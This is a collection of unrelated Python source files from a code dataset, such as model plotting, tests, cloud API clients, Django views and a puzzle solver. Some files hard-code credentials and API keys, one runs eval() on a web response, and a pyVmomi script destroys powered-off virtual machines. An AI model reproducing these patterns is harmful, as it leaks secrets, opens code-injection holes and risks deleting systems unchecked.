plt.title('Model accuracy')\n plt.title('Test Accuracy = '+str(test_acc))\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.savefig(\"result/accuracy.png\")\n plt.close()\n\n # Plot training & validation loss values\n plt.ylim(0, 0.5)\n plt.plot(hist.history['loss'])\n plt.plot(hist.history['val_loss'])\n plt.title('Test Loss = '+str(test_loss))\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.savefig(\"result/loss.png\")\n\n # Save model\n model.save_weights('result/weights.h5')\n return model\nvgg_like(train_X, trainHot_Y, test_X, testHot_Y)\n","sub_path":"models/VGG/vgglike.py","file_name":"vgglike.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"271574192","text":"import time\r\n\r\n# Function: run_sleep_timer\r\n# Desc: Utilizes time.sleep to run a timer\r\ndef runTimer( hours, minutes ):\r\n\r\n\t# initalizing variables\r\n\thours = hours\r\n\tminutes = minutes;\r\n\tseconds = 0\r\n\r\n\t# calculate total duration in seconds\r\n\tduration = int(( hours * 3600 ) + ( minutes * 60 ))\r\n\r\n\t# iterate through duration ( 0 to duration )\r\n\tfor i in range(duration):\r\n\t\tif seconds == 0:\r\n\t\t\tif minutes != 0:\r\n\t\t\t\tminutes = minutes - 1\r\n\t\t\t\tseconds = 60\r\n\t\tif minutes == 0:\r\n\t\t\tif hours != 0:\r\n\t\t\t\thours = hours - 1\r\n\t\t\t\tminutes = 59\r\n\t\t\t\tseconds = 60\r\n\r\n\t\t# decremenet seconds\r\n\t\tseconds = seconds - 1\r\n\r\n\t\t# wait for 1 second\r\n\t\ttime.sleep(1)\r\n\r\n\t\t# output current timer countdown\r\n\t\tprint( hours, \":\", minutes, \":\", seconds )","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"87578353","text":"\"\"\"Unit tests for the exponential manifold.\"\"\"\n\nfrom scipy.stats import poisson\n\nimport geomstats.backend as gs\nimport tests.conftest\nfrom tests.conftest import Parametrizer, np_backend\nfrom tests.data.poisson_data import PoissonMetricTestData, PoissonTestData\nfrom tests.geometry_test_cases import OpenSetTestCase, RiemannianMetricTestCase\n\nNOT_AUTODIFF = np_backend()\n\n\nclass TestPoisson(OpenSetTestCase, metaclass=Parametrizer):\n testing_data = PoissonTestData()\n\n def test_belongs(self, point, expected):\n self.assertAllClose(self.Space().belongs(point), expected)\n\n def test_random_point(self, point, expected):\n self.assertAllClose(point.shape, expected)\n\n def test_sample_shape(self, point, n_samples, expected):\n self.assertAllClose(self.Space().sample(point, n_samples).shape, expected)\n\n @tests.conftest.np_and_autograd_only\n def test_point_to_pdf(self, point, n_samples):\n point = gs.to_ndarray(point, 1)\n n_points = point.shape[0]\n pmf = self.Space().point_to_pdf(point)\n point_to_sample = point[0] if point.ndim > 1 else point\n samples = gs.to_ndarray(self.Space().sample(point_to_sample, n_samples), 1)\n result = gs.squeeze(pmf(samples))\n pmf = []\n for i in range(n_points):\n pmf.append(gs.array([poisson.pmf(x, point[i]) for x in samples]))\n expected = gs.squeeze(gs.stack(pmf, axis=0))\n self.assertAllClose(result, expected)\n\n\nclass TestPoissonMetric(RiemannianMetricTestCase, metaclass=Parametrizer):\n skip_test_parallel_transport_ivp_is_isometry = True\n skip_test_parallel_transport_bvp_is_isometry = True\n skip_test_exp_ladder_parallel_transport = True\n skip_test_riemann_tensor_shape = NOT_AUTODIFF\n skip_test_ricci_tensor_shape = NOT_AUTODIFF\n skip_test_scalar_curvature_shape = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_is_skew_symmetric_1 = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_is_skew_symmetric_2 = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_bianchi_identity = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_is_interchange_symmetric = NOT_AUTODIFF\n skip_test_sectional_curvature_shape = NOT_AUTODIFF\n testing_data = PoissonMetricTestData()\n\n def test_squared_dist(self, space, point_a, point_b, expected):\n space.equip_with_metric(self.Metric)\n self.assertAllClose(space.metric.squared_dist(point_a, point_b), expected)\n\n def test_metric_matrix(self, space, point, expected):\n space.equip_with_metric(self.Metric)\n self.assertAllClose(space.metric.metric_matrix(point), expected)\n\n def test_geodesic_symmetry(self, space):\n space.equip_with_metric(self.Metric)\n point_a, point_b = space.random_point(2)\n path_ab = space.metric.geodesic(initial_point=point_a, end_point=point_b)\n path_ba = space.metric.geodesic(initial_point=point_b, end_point=point_a)\n t = gs.linspace(0.0, 1.0, 10)\n self.assertAllClose(path_ab(t), path_ba(1 - t))\n","sub_path":"tests/tests_geomstats/test_poisson.py","file_name":"test_poisson.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"414806016","text":"# coding: utf-8\n\"\"\"\nBase para desarrollo de modulos externos.\nPara obtener el modulo/Funcion que se esta llamando:\n GetParams(\"module\")\n\nPara obtener las variables enviadas desde formulario/comando Rocketbot:\n var = GetParams(variable)\n Las \"variable\" se define en forms del archivo package.json\n\nPara modificar la variable de Rocketbot:\n SetVar(Variable_Rocketbot, \"dato\")\n\nPara obtener una variable de Rocketbot:\n var = GetVar(Variable_Rocketbot)\n\nPara obtener la Opcion seleccionada:\n opcion = GetParams(\"option\")\n\n\nPara instalar librerias se debe ingresar por terminal a la carpeta \"libs\"\n \n pip install -t .\n\n\"\"\"\nimport sys\nimport os\nimport requests\nbase_path = tmp_global_obj[\"basepath\"]\ncur_path = base_path + 'modules' + os.sep + 'pdf2word' + os.sep + 'libs' + os.sep\nsys.path.append(cur_path)\nprint(cur_path)\nimport groupdocs_conversion_cloud\n\n\"\"\"\n Obtengo el modulo que fue invocado\n\"\"\"\nmodule = GetParams(\"module\")\nglobal app_sid\nglobal app_key\n\nif module == \"pdf2word\":\n\n app_sid = GetParams(\"app_sid\")\n app_key = GetParams(\"app_key\")\n path_pdf = GetParams(\"path_pdf\")\n path_word = GetParams(\"path_word\")\n\n try:\n\n # Create instance of the API\n convert_api = groupdocs_conversion_cloud.ConvertApi.from_keys(app_sid, app_key)\n file_api = groupdocs_conversion_cloud.FileApi.from_keys(app_sid, app_key)\n\n # upload soruce file to storage\n filename = '02_pages.pdf'\n remote_name = '02_pages.pdf'\n output_name = 'sample.docx'\n strformat = 'docx'\n\n request_upload = groupdocs_conversion_cloud.UploadFileRequest(path_pdf, path_pdf)\n response_upload = file_api.upload_file(request_upload)\n\n # Convert PDF to Word document\n settings = groupdocs_conversion_cloud.ConvertSettings()\n settings.file_path = path_pdf\n settings.format = strformat\n settings.output_path = output_name\n\n loadOptions = groupdocs_conversion_cloud.PdfLoadOptions()\n loadOptions.hide_pdf_annotations = True\n loadOptions.remove_embedded_files = False\n loadOptions.flatten_all_fields = True\n\n settings.load_options = loadOptions\n\n convertOptions = groupdocs_conversion_cloud.DocxConvertOptions()\n #convertOptions.from_page = 2\n #convertOptions.pages_count = 2\n\n settings.convert_options = convertOptions\n settings.output_path = \"converted\\\\todocx\"\n\n request = groupdocs_conversion_cloud.ConvertDocumentRequest(settings)\n response = convert_api.convert_document(request)[0].url\n\n #print(\"Document converted successfully: \" + str(response))\n\n url_ = str(response)\n\n url_token = \"https://api.groupdocs.cloud/connect/token\"\n\n payload = \"client_id=\"+app_sid+\"&client_secret=\"+app_key+\"&grant_type=client_credentials\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'Accept': \"application/json\"\n }\n\n response = requests.request(\"POST\", url_token, data=payload, headers=headers)\n\n #print('TOKEN',response.text)\n\n token_ = eval(response.text)\n key, val = next(iter(token_.items()))\n token_ = str(val)\n\n headers = {\n 'Authorization': \"Bearer \"+token_+\"\"\n }\n\n response = requests.request(\"GET\", url_, headers=headers)\n\n #print('DOWNLOAD',response.text)\n\n with open(path_word, \"wb\") as f:\n f.write(response.content)\n f.close()\n\n except Exception as e:\n PrintException()\n raise e\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"649557625","text":"import json\nimport logging\n\nfrom AnalysisEngine import Util\nfrom AnalysisEngine.TwitterObj import Status\nfrom AnalyticsService.Analytics.Analytics import Analytics\n\n\nclass TD_TotalTweets(Analytics):\n _logger = logging.getLogger(__name__)\n\n _options = [\"Minute\",\"Hour\",\"Day\",\"Week\"]\n\n __type_name = \"Total Tweet Time Distribution\"\n __arguments = [{\"name\": \"timeInterval\", \"prettyName\": \"Time interval\", \"type\": \"enum\", \"options\": _options,\n \"default\": \"Hour\"}]\n\n @classmethod\n def get_args(cls):\n return cls.__arguments + super(TD_TotalTweets, cls).get_args()\n\n @classmethod\n def get_type(cls):\n return cls.__type_name\n\n ####################################################################################################################\n\n @classmethod\n def get(cls, analytics_meta, gridfs, db_col, args, schema_id):\n\n time_interval = args[\"timeInterval\"]\n\n if time_interval not in cls._options:\n cls._logger.exception(\"Wrong time quantum given\")\n return False\n\n date_field = \"$\" + Status.SCHEMA_MAP[schema_id][\"ISO_date\"]\n p1, p2 = Util.get_date_projection(date_field, time_interval)\n g1 = {\"$group\": {\"_id\": \"$date\",\"count\": {\"$sum\": 1}}}\n s1 = {\"$sort\": {\"_id.dt\": 1}}\n p3 = {\"$project\": {\"dt\": \"$_id\", \"count\": \"$count\", \"_id\": 0}}\n\n c = db_col.aggregate([{\"$project\": p1},{\"$project\": p2},g1,s1,p3], allowDiskUse = True)\n\n result_lst = list(c)\n x_values = set()\n for l in result_lst:\n x_values.add(l[\"dt\"])\n\n result = {\"details\": {\"chartType\": \"msline\",\n \"chartProperties\": {\"yAxisName\": \"Tweets per \" + time_interval.lower(),\n \"xAxisName\": \"Date (UTC)\",\n \"caption\": \"Tweet Rate over Time\",\n \"labelStep\": min(1,int(len(x_values) / 20.0))}},\n \"data\": {\"categories\": sorted(x_values),\"values\":[{\"_id\": \"ALL\",\"data\":result_lst}]}}\n\n\n cls.create_chart(gridfs, analytics_meta, result)\n\n cls.export_json(analytics_meta, json.dumps(result, default = Util.date_encoder), gridfs)\n\n return True\n","sub_path":"server/src/AnalyticsService/Analytics/TimeStats/TD_TotalTweets.py","file_name":"TD_TotalTweets.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"363884164","text":"#coding=utf-8\nfrom pyVmomi import vim\nimport sys,time\n\"\"\"删除虚拟机\"\"\"\ndef create_vcenter_si():\n vcenter_ip = '192.168.134.98'\n vcenter_user = 'root'\n vcenter_pwd = 'pass1234!@#$'\n vcenter_port = 443\n si = None\n\n import ssl\n from pyVim import connect\n import atexit\n ssl_context = ssl.create_default_context()\n ssl_context.check_hostname = False\n ssl_context.verify_mode = ssl.CERT_NONE\n\n try:\n si = connect.SmartConnect(host=vcenter_ip, user=vcenter_user, pwd=vcenter_pwd,\n port=vcenter_port, sslContext=ssl_context)\n atexit.register(connect.Disconnect, si)\n except Exception as e:\n print(str(e))\n return si\n\ndef main():\n si = create_vcenter_si()\n content = si.RetrieveServiceContent()\n objView = content.viewManager.CreateContainerView(content.rootFolder,\n [vim.ComputeResource],\n True)\n vmList = objView.view\n objView.Destroy()\n\n for host in vmList:\n if host.name == \"192.168.134.21\":\n objView = content.viewManager.CreateContainerView(host,\n [vim.VirtualMachine],\n\n True)\n vmList = objView.view\n objView.Destroy()\n for vm in vmList:\n print(vm.name)\n # vm.PowerOff()\n if not vm.resourcePool is None:\n try:\n if vm.runtime.powerState == \"poweredOff\":\n vm.Destroy()\n time.sleep(1)\n else:\n print(\"请先运行关闭虚拟机脚本,再来执行本程序\")\n except:\n errormsg = sys._getframe().f_code.co_filename, sys._getframe().f_code.co_name, sys._getframe().f_lineno\n print(errormsg)\n\n\nif __name__ == \"__main__\":\n main()\n print(\"DOing all.....\")","sub_path":"delete/host_delete_vm.py","file_name":"host_delete_vm.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"20611236","text":"from django.shortcuts import render, redirect\nfrom .models import Item\nfrom ..loginApp.models import User\nfrom django.contrib import messages\n\n\n# Create your views here.\ndef index(request):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\n\tuser = User.objects.get(id=request.session[\"id\"])\n\n\tcontext = {\n\t\t\"items_on\": Item.objects.filter(added_by=user) | Item.objects.filter(wishlistitems__id=user.id),\n\t\t\"items_off\": Item.objects.exclude(added_by=user).exclude(wishlistitems__id=user.id),\n\t\t\"name\": user.name,\n\t}\n\treturn render(request, \"secondApp/index.html\", context)\n\ndef show(request, id):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\t\n\tuser = User.objects.get(id=request.session[\"id\"])\n\tcontext = {\n\t\t\"items_on\": Item.objects.filter(added_by=user) | Item.objects.filter(wishlistitems__id=user.id),\n\t\t\"items_off\": Item.objects.exclude(added_by=user).exclude(wishlistitems__id=user.id),\n\t\t\"name\": user.name,\n\t\t\"item\": Item.objects.get(id=id),\n\t}\n\treturn render(request, \"secondApp/show.html\", context)\n\ndef new(request):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\n\treturn render(request, \"secondApp/create.html\")\n\ndef join(request, id):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\t\n\titem = Item.objects.get(id=id)\n\tuser = User.objects.get(id=request.session[\"id\"])\n\n\titem.wishlistitems.add(user)\n\n\treturn redirect(\"dashboard\")\n\ndef create(request):\n\tItem.objects.create(item=request.POST[\"item\"], added_by=User.objects.get(id=request.session[\"id\"]))\n\treturn redirect(\"dashboard\")\n\ndef addtowishlist(request, id):\n\tcontext = {\n\t\t\"item\": Item.objects.get(id=id),\n\t\t\"items_off\": Item.objects.filter(added_by=user) | Item.objects.filter(wishlistitems__id=user.id),\n\t\t\"items_on\": Item.objects.exclude(added_by=user).exclude(wishlistitems__id=user.id),\n\t}\n\t# Clicking the a tag for Add to my Wishlist, the item will be displayed on the top table and will be removed from the 'Other Users' Wish List' table\n\treturn redirect(\"dashboard\", context)\n\ndef removefromwishlist(request,id):\n\tcontext = {\n\t\t\"item\": Item.objects.get(id=id),\n\t\t\"items_off\": Item.objects.filter(added_by=user) | Item.objects.filter(wishlistitems__id=user.id),\n\t\t\"items_on\": Item.objects.exclude(added_by=user).exclude(wishlistitems__id=user.id),\n\t}\n\t#remove a tag will remove the item from the table and will display it on the Other Users' Wish List table\n\treturn redirect(\"dashboard\", context)\n\ndef delete(request,id):\n\tcontext = {\n\t\t\"item\": Item.objects.get(id=id)\n\t}\n\t#delete a tag will remove the item from the database\n\treturn redirect(\"dashboard\", context)\n","sub_path":"apps/secondApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"520067339","text":"\"\"\"\nClustering datasets may be found at\nhttp://cs.joensuu.fi/sipu/datasets/\n\"\"\"\nfrom progressivis import Scheduler, Every # , log_level\nfrom progressivis.core import aio\nfrom progressivis.cluster import MBKMeans, MBKMeansFilter\nfrom progressivis.io import CSVLoader\nfrom progressivis.vis import MCScatterPlot\nfrom progressivis.utils.psdict import PDict\nimport numpy as np\nimport os.path\nimport tempfile\nfrom progressivis.datasets.random import (\n generate_random_multivariate_normal_csv as gen_csv,\n)\n\ntry:\n s = scheduler\nexcept NameError:\n s = Scheduler()\n\n\ndir_name = os.path.join(tempfile.gettempdir(), \"progressivis_tmp_\")\n\nos.makedirs(dir_name, exist_ok=True)\n\nfile_name = os.path.join(dir_name, \"foobar.csv\")\n\ngen_csv(file_name, rows=99999, reset=True) # , header='_0,_1', reset=False)\n\ndata = CSVLoader(\n file_name, skipinitialspace=True, header=None, index_col=False, scheduler=s\n)\nn_clusters = 3\nmbkmeans = MBKMeans(\n columns=[\"_0\", \"_1\"],\n n_clusters=n_clusters,\n batch_size=100,\n tol=0.01,\n is_input=False,\n scheduler=s,\n)\nclasses = []\nfor i in range(n_clusters):\n cname = f\"k{i}\"\n filt = MBKMeansFilter(i)\n filt.create_dependent_modules(mbkmeans, data, \"table\")\n classes.append(\n {\n \"name\": cname,\n \"x_column\": \"_0\",\n \"y_column\": \"_1\",\n \"sample\": mbkmeans if i == 0 else None,\n \"input_module\": filt,\n \"input_slot\": \"table\",\n }\n )\n\nsp = MCScatterPlot(scheduler=s, classes=classes)\nsp.create_dependent_modules()\nfor i in range(n_clusters):\n cname = f\"k{i}\"\n sp[cname].min_value._table = PDict({\"_0\": -np.inf, \"_1\": -np.inf})\n sp[cname].max_value._table = PDict({\"_0\": np.inf, \"_1\": np.inf})\nmbkmeans.input.table = data.output.table\nmbkmeans.create_dependent_modules()\nsp.move_point = mbkmeans.moved_center # for input management\n\n\ndef myprint(d):\n if d[\"convergence\"] != \"unknown\":\n print(d)\n else:\n print(\".\", end=\"\")\n\n\nprn = Every(scheduler=s, proc=print)\nprn.input.df = mbkmeans.output.conv\n\nif __name__ == \"__main__\":\n # data.start()\n # s.join()\n aio.run(s.start())\n","sub_path":"examples/test_multiclass_k_clusters.py","file_name":"test_multiclass_k_clusters.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"128565568","text":"import requests\nimport json\n\npayload = {'q':\"potato and paneer\" , 'app_id':'6cbe9008' , 'app_key':'c300031de9d768b3b7ca4fa828c95e0e' , 'from':0 , 'to':50}\nr = requests.get(url=\"https://api.edamam.com/search\" , params=payload)\n\nprint(r.status_code);\nresponse = json.loads(r.content)\n# print(response)\ni=0\nfor y in response['hits']:\n print(y['recipe']['label']);\n ingr = y['recipe']['ingredients']\n for x in ingr:\n print(x['text'] + \" and the right amount is \" + str(x['weight']))\n print()\n i = i+1\n","sub_path":"api/edamam_api.py","file_name":"edamam_api.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"446724440","text":"import os\nimport numpy as np\n\nimport tensorflow as tf\n\nfrom layers import conv_layer\nfrom utils import init_weights, gen_data\n\n\nclass CryptoNet(object):\n def __init__(self, sess, model_path, msg_len=96):\n self.sess = sess\n self.model_path = model_path\n self.msg_len = msg_len\n self.key_len = self.msg_len\n self.N = self.msg_len\n\n self.build_model()\n self.load_model()\n\n def build_model(self):\n # Weights for fully connected layers\n self.w_alice = init_weights(\"alice_w\", [2 * self.N, 2 * self.N])\n\n # Placeholder variables for Message and Key\n self.msg = tf.placeholder(\"float\", [None, self.msg_len])\n self.key = tf.placeholder(\"float\", [None, self.key_len])\n\n # Alice's network\n # FC layer -> Conv Layer (4 1-D convolutions)\n self.alice_input = tf.concat([self.msg, self.key], 1)\n self.alice_hidden = tf.nn.sigmoid(tf.matmul(self.alice_input, self.w_alice))\n self.alice_hidden = tf.expand_dims(self.alice_hidden, 2)\n self.alice_output = tf.squeeze(conv_layer(self.alice_hidden, \"alice\"))\n\n def load_model(self):\n saver = tf.train.Saver()\n saver.restore(self.sess, self.model_path)\n print('model restored')\n\n def encrypt_hex(self, msg: list, key: list):\n assert len(msg) == self.msg_len, \\\n 'illegal msg (assert len(msg) == {})'.format(self.msg_len)\n assert len(key) == self.key_len, \\\n 'illegal key (assert len(key) == {})'.format(self.key_len)\n\n for i, j in zip(msg, key):\n assert not (i < -1 or i > 1 or j < -1 or j > 1), \\\n 'values should be in the range of [-1, 1]'\n\n msg = np.array(msg).reshape(-1, self.msg_len)\n key = np.array(key).reshape(-1, self.key_len)\n return self.sess.run(self.alice_output,\n feed_dict={self.msg: msg, self.key: key})\n\n def test_interactive(self):\n def convert(x):\n return np.array([[2*int(i)-1 for i in x]])\n\n while True:\n P = convert(input('MSG> ')[:self.msg_len])\n K = convert(input('KEY> ')[:self.key_len])\n\n enc = self.sess.run(\n self.alice_output,\n feed_dict={self.msg: P, self.key: K})\n print('ENC>', ''.join(np.where(enc>0, '1', '0')))\n","sub_path":"server/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"514337323","text":"##############################################################################\n#\n# Copyright (c) 2008 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\nimport os\n\nEGG_INFO_CONTENT = \"\"\"Metadata-Version: 1.0\nName: %s\nVersion: 0.0\n\"\"\"\n\n\nclass Recipe:\n\n def __init__(self, buildout, name, options):\n self.buildout, self.name, self.options = buildout, name, options\n options.setdefault('zope2-part', 'zope2')\n options.setdefault('zope2-location', '')\n options.setdefault('additional-fake-eggs', '')\n options.setdefault('skip-fake-eggs', '')\n\n def install(self):\n zope2Location = self.options['zope2-location'].strip()\n if zope2Location == '':\n zope2Part = self.options['zope2-part'].strip()\n zope2Location = self.buildout[zope2Part]['location']\n\n developEggDir = self.buildout['buildout']['develop-eggs-directory']\n zopeLibZopeLocation = os.path.join(zope2Location, 'lib', 'python',\n 'zope')\n zopeLibZopeAppLocation = os.path.join(zope2Location, 'lib', 'python',\n 'zope', 'app')\n zopeLibs = [\"zope.%s\" % lib for lib in os.listdir(zopeLibZopeLocation)\\\n if os.path.isdir(os.path.join(zopeLibZopeLocation, lib))]\n zopeLibs += [\"zope.app.%s\" % lib for lib in os.listdir(zopeLibZopeAppLocation)\\\n if os.path.isdir(os.path.join(zopeLibZopeAppLocation, lib))]\n zopeLibs += [lib for lib in self.options['additional-fake-eggs'].split('\\n')]\n zopeLibs = [lib for lib in zopeLibs if lib not in\n self.options.get('skip-fake-eggs', '').split('\\n')]\n for zopeLib in zopeLibs:\n fakeLibEggInfoFile = os.path.join(developEggDir,\n '%s.egg-info' % zopeLib)\n fd = open(fakeLibEggInfoFile, 'w')\n fd.write(EGG_INFO_CONTENT % zopeLib)\n fd.close()\n return ()\n\n def update(self):\n return self.install()\n","sub_path":"z3c.recipe.fakezope2eggs/trunk/src/z3c/recipe/fakezope2eggs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"132823116","text":"from json import load as json_load\nfrom gc import collect as gc_collect\n\nimport time_utils\nfrom components import Components\nfrom network_wrapper import NetworkWrapper\nfrom utime import sleep\n\n\ndef calculate_temperature_color(internal_temperature, external_temperature):\n\n temperature_range = config['behavior']['temperature_range']\n external_temperature_allowed_offset = config['behavior']['external_temperature_allowed_offset']\n\n if internal_temperature > temperature_range['max']:\n return (True, False, False) # Hot - Red light\n elif internal_temperature < temperature_range['min']:\n return (False, False, True) # Cold - Blue light\n else:\n if external_temperature - external_temperature_allowed_offset > temperature_range['max']:\n return (True, False, False) # Hot - Red light\n elif external_temperature + external_temperature_allowed_offset < temperature_range['min']:\n return (False, False, True) # Cold - Blue light\n else:\n return (False, True, False) # Good - Green light\n\nwith open('config.json') as json_data:\n config = json_load(json_data)\n\nnw = NetworkWrapper(wifi_config=config['wifi'], ubidots_config=config['ubidots'])\n\ntime_utils.sync_ntp(nw)\ncomponents = Components()\ncomponents.rgb_led.set_colors(False, False, False)\n\nlast_notification_timestamp_sec = 0\n\nwhile True:\n sensors_data = nw.get_sensors_data()\n\n # Color-by-temperature LED\n r, g, b = calculate_temperature_color(float(sensors_data['internal-temperature']),\n float(sensors_data['external-temperature']))\n components.rgb_led.set_colors(r, g, b)\n\n # Water level display\n components.seven_segment.number(int(sensors_data['water-level']))\n\n # Drinking notification\n if time_utils.check_drinking_notification_required(sensors_data['last-drinking-timestamp'] // 1000,\n last_notification_timestamp_sec,\n config['behavior']['required_drinking_frequency_minutes'] * 60):\n components.buzzer.play_drinking_notification()\n last_notification_timestamp_sec = time_utils.unix_time()\n\n # Night light\n if sensors_data['light-level'] < config['behavior']['night_light_threshold']:\n components.led.on()\n else:\n components.led.off()\n\n gc_collect()\n\n sleep(config['behavior']['measurements_interval_sec'])\n","sub_path":"src/outputs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"494913073","text":"import os\n\ndef get_secret(secret_name):\n try:\n with open('/run/secrets/{0}'.format(secret_name), 'r') as secret_file:\n return secret_file.read()\n except IOError:\n return None\n\nsshfs = get_secret(\"sign_bank_command_sshfs_images\")\nsshfs2 = get_secret(\"sign_bank_command_sshfs_videos\")\n\nos.system(sshfs)\nos.system(sshfs2)\n","sub_path":"signbank/dictionary/mountfs.py","file_name":"mountfs.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"221633134","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: Hogan\n\"\"\"\n\nimport jieba\nfrom wordcloud import WordCloud\nimport pandas as pd\nimport readFile\nimport matplotlib.pyplot as plt\nimport re\n\ndef jieba_cut(data):\n a = []\n worddict = {}\n for i in data:\n words = jieba.lcut(i)\n a.extend(words)\n for word in a:\n worddict.setdefault(word,0)\n worddict[word]+=1\n return worddict\n\ndef deal_with_meanless_word(data):\n mean_words = {}\n for i in data.keys():\n if len(i) > 1:#认为小于一个长度的字没有意义,最好的情况下是自己定义一个没有意义的列表\n mean_words[i] = data[i]\n return mean_words\n\n\ndef plot_mean_word(data):\n str_data = data.name.astype('str')\n popular_words = jieba_cut(str_data)\n mean_words = deal_with_meanless_word(popular_words)\n mean_words_df = pd.Series(mean_words).sort_values(ascending=False)\n mean_words_df_top15 = mean_words_df.head(15)\n print('top 15 mean words')\n print(mean_words_df_top15)\n \n plt.figure(figsize=(15,8))\n plt.title('最受欢迎的房间中描述关键词')\n mean_words_df_top15.plot(kind='bar')\n \n wordcloud_use = ' '.join(mean_words.keys())\n resultword=re.sub(\"[A-Za-z0-9]\", \"\",wordcloud_use) \n \n w = WordCloud(scale=4,background_color='white', font_path='SIMLI.TTF', \n max_words = 2000,max_font_size = 20,random_state=20).generate(resultword[:200])\n w.to_file('result.jpg')\n \nif __name__ == '__main__':\n\n plot_mean_word(readFile.reviews_top90)\n\n\n","sub_path":"wordCloudPic.py","file_name":"wordCloudPic.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"256554916","text":"# -*- coding: utf-8 -*-\n'''\nCreated on :2018/6/8:14:56\n\n@author: yunxia.qiu\n'''\n\nfrom base_driver import BaseDriver\nfrom util.get_by_local import GetByLocal\nclass jssdk_class():\n def __init__(self,i):\n dr = BaseDriver()\n self.driver =dr.android_driver(i)\n self.loc=GetByLocal(self.driver)\n\n\n def open_app(self,url):\n # 定位输入框\n self.input=self.loc.get_element('chrome_app','input_text')\n self.input.send_keys(url)\n\n def switch_js(self):\n list=self.driver.contexts\n for i in list:\n if i in 'webview':\n self.driver.switch_to.context(i)\n\n\n\n\n\n\n\n","sub_path":"jssdk_ui/base/jssdk_case.py","file_name":"jssdk_case.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"644631937","text":"import pymongo\nfrom flask import jsonify\nimport json\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\nmydb = myclient[\"questions\"]\nmycol = mydb[\"questions\"]\n\nresult = None\n\nwith open('tmmQuestions.json') as f:\n result = json.load(f)\n\nif result is not None:\n for question in result[\"questions\"]:\n x = mycol.insert_one(question)\n print (x)\n","sub_path":"MongoPy.py","file_name":"MongoPy.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"640999569","text":"import numpy as np\nimport subprocess\nimport os\ndef odswiez_ekran():\n subprocess.call(\"cls\", shell=True)\ndef poczekaj(czas):\n cz=0\n while(cz library.days_to_signup:\n list_of_signed_up.append(library)\n days_to_ship -= library.days_to_signup\n # counts the books for this specific library\n for i in range(days_to_ship):\n # print(f\"Days left {days_to_ship}, index is {ind}\")\n for x in range(library.speed):\n # print(f\"{library.books_to_scan} and {library.list_of_books}\")\n if len(library.books_to_scan) == len(library.list_of_books):\n break\n\n while library.list_of_books[ind + x] in global_set_books:\n if ind < len(library.list_of_books) - library.speed - 2:\n # print(\"Book already scanned\")\n ind += 1\n else:\n break\n library.books_to_scan.append(library.list_of_books[ind + x])\n global_set_books.add(library.list_of_books[ind + x])\n if ind < len(library.list_of_books) - library.speed - 1:\n ind += library.speed\n else:\n break\n if len(library.books_to_scan) == len(library.list_of_books):\n break\n\n # print(library.list_of_books)\n # print(f\"Books to scan from {library.id}: {library.books_to_scan}\")\n write_file(file, list_of_signed_up)\n\n\nif __name__ == \"__main__\":\n tic = time.perf_counter()\n # process(file_names[0])\n for file 